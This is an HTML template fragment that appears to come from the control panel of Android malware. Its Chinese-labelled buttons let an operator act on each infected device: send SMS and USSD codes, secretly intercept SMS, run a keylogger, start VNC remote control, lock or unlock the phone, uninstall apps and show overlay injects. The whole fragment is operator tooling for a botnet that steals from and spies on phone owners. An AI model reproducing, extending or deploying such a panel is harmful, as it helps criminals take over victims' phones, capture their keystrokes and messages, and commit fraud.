
<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=send_sms' title='发送短信'><button class='btn btn-sm btn-warning'>发送短信</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=ussd' title='发送USSD指令'><button class='btn btn-sm btn-success'>发送USSD</button></a>

<!--
<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=repeat_inject' title='重复注入'><button class='btn btn-sm btn-brown'>重复注入</button></a>
-->

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=push'><button class='btn btn-sm btn-magenta' title='发送推送通知'>推送通知</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=open_url'><button class='btn btn-sm btn-success' title='打开URL'>打开URL</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=run_app'><button class='btn btn-sm btn-default' title='通过包名运行应用'>运行应用</button></a>

<hr />

<button id="lock_device_off" title="需要设备管理员权限" class='btn btn-sm btn-info disabled'><i class="flaticon-vintage-key-outline" style="color: white"></i> 锁定</button>

<span id="lock_device">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=lock' title='锁定设备(屏幕/声音/密码)'><button class='btn btn-sm btn-info'><i class="flaticon-vintage-key-outline" style="color: white"></i> 锁定</button></a>
</span>

<span id="unlock_device">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=unlock' title='解锁设备(屏幕/声音/密码)'><button class='btn btn-sm btn-danger'><i class="flaticon-vintage-key-outline" style="color: white"></i> 解锁</button></a>
</span>


<span id="start_sms_intercept">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_intercept'><button class='btn btn-sm btn-info' title='开始隐藏短信拦截'>开始短信拦截</button></a>
</span>

<span id="stop_sms_intercept">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_intercept'><button class='btn btn-sm btn-danger' title='停止隐藏短信拦截'>停止短信拦截</button></a>
</span>

<hr style="display:none" id="mass_delim" />

<span id="start_fg">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_fg'><button class='btn btn-sm btn-warning' title='开启防休眠'>开启防休眠</button></a>
</span>

<span id="stop_fg">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_fg'><button class='btn btn-sm btn-danger' title='关闭防休眠'>关闭防休眠</button></a>
</span>

<span id="start_vnc">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=start_vnc'><button class='btn btn-sm btn-primary' title='开始VNC'>开始VNC</button></a>
</span>

<span id="stop_vnc">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_vnc'><button class='btn btn-sm btn-danger' title='停止VNC'>停止VNC</button></a>
</span>

<hr />

<span id="start_keylogger">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=start_keylogger'><button class='btn btn-sm btn-info' title='开始键盘记录'>开始键盘记录</button></a>
</span>

<span id="stop_keylogger">
	<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=stop_keylogger'><button class='btn btn-sm btn-danger' title='停止键盘记录'>停止键盘记录</button></a>
</span>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=uninstall_apps'><button class='btn btn-sm btn-primary' title='卸载应用'>卸载应用</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=kill_bot' onclick='return confirm("确定吗?")'><button class='btn btn-sm btn-brown' title='结束应用进程'>结束进程</button></a>

<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=show_inject'><button class='btn btn-sm btn-default' title='显示注入'>显示注入</button></a>

<script>%VISIBILITY%</script>
